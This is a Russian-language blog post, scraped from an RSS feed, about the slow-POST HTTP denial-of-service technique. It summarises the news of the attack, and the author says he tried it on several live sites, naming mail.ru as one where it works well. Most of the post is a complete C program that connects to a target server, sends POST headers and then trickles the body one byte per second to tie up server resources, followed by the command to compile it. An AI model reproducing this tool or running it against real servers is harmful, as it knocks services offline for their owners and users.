по стопам webkill'а » POST http://blog.lukmus.ru это наш химический дом для печальных жителей Земли Sat, 21 Oct 2023 19:10:13 +0000 ru-RU hourly 1 http://wordpress.org/?v=3.4.2 реализация DoS медленного POST http://blog.lukmus.ru/2010/11/10/realizatsiya-dos-medlennogo-post/ http://blog.lukmus.ru/2010/11/10/realizatsiya-dos-medlennogo-post/#comments Wed, 10 Nov 2010 10:58:13 +0000 lukmus http://blog.lukmus.ru/?p=589 8-го ноября была опубликована новость о новой уязвимости HTTP, а так же некоторых других протоколов прикладного уровня:

Уязвимость опирается на так называемый «медленный» POST-трафик, который затруднительно дифференцировать от законного обмена данными. DDOS-атаки легко проводить в окружении многопользовательских онлайновых игр как среды распределенных компьютерных сетей, затрагивающих массу вычислительных систем.

Что интересно, «медленная» POST-технология может быть вполне адаптирована для работы с SMTP и даже DNS-серверами. Атака работает так: вредоносный код отправляет POST-заголовки с легитимно заполненными полями, касающимися размеров готовящихся к передаче данных, однако последние затем передаются на очень низких скоростях, что приводит к формированию «заторов» на серверах и связыванию их системных ресурсов. Достаточно нескольких десятков тысяч ботов, чтобы отключить сервер. Балансирующее нагрузку ПО, ныне используемое для предотвращения DDOS-атак, не эффективно против новой методики.

В общем суть сводится к тому что мы посылаем совершенно обыкновенный POST, где data идет очень долго, иначе говоря data’у посылаем посимвольно с задержками.

Проверял на нескольких сайтах, где-то обрывают соединение не понятно почему, где-то нет. Вероятно, не работает там, где используется nginx как front-end. Что удивительно, как будто этот код написан под mail.ru, там идет как литое.

Реализация на C под Linux:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75

#include <stdio.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
 
#define BUF_LEN 4096
#define HTTP_PORT 80
#define SLEEP_PERIOD 1
#define POST_COUNT "100"
#define PATH "/path/to/post"
 
int main (int argc, char ** argv)
{
int sock, count;
char * buf;
struct hostent * host;
struct sockaddr_in addr;
 
if (argc < 2) {
fprintf (stderr, "Too few arguments\n");
return 1;}
 
buf = (char *) malloc (BUF_LEN);
 
if (buf == NULL) {
fprintf (stderr, "malloc() error\n");
return 1;}
 
sock = socket (PF_INET, SOCK_STREAM, 0);
 
if (sock == -1) {
fprintf (stderr, "socket() error\n");
return 1;}
 
addr.sin_family = AF_INET;
 
host = gethostbyname (argv[1]);
 
if (host == NULL) {
fprintf (stderr, "Unknown server\n");
return 1;}
 
addr.sin_addr = * (struct in_addr*)host->h_addr_list[0];
 
addr.sin_port = htons (HTTP_PORT);
 
if (connect(sock,(struct sockaddr*) &addr, sizeof (addr))==-1)
 {fprintf (stderr, "connect() error\n");
return 1;}
 
strcpy (buf, "POST ");
strcat (buf,PATH);
strcat (buf," HTTP/1.1\r\n");
strcat (buf,"Content-Type: application/x-www-form-urlencoded\r\n");
strcat (buf,"Content-Length: ");
strcat (buf,POST_COUNT);
strcat (buf,"\r\n\r\n");
 
fprintf(stderr,buf);
write (sock, buf, strlen (buf));
 
for(int i=0;i<atoi(POST_COUNT)-1;i++){
fprintf(stderr,"-%d", i);
write(sock,"a",1);
sleep(SLEEP_PERIOD);}
strcpy(buf,"\r\n");
write (sock, buf, strlen (buf));
 
while ((count = read (sock, buf, BUF_LEN)) > 0)
write (1, buf, count);
 
close (sock);
free (buf);
return 0;

Компилируем так:

1

$ gcc -o newdos newdos.c -std=gnu9

Полную новость смотрите на rdot’е.

]]> http://blog.lukmus.ru/2010/11/10/realizatsiya-dos-medlennogo-post/feed/ 0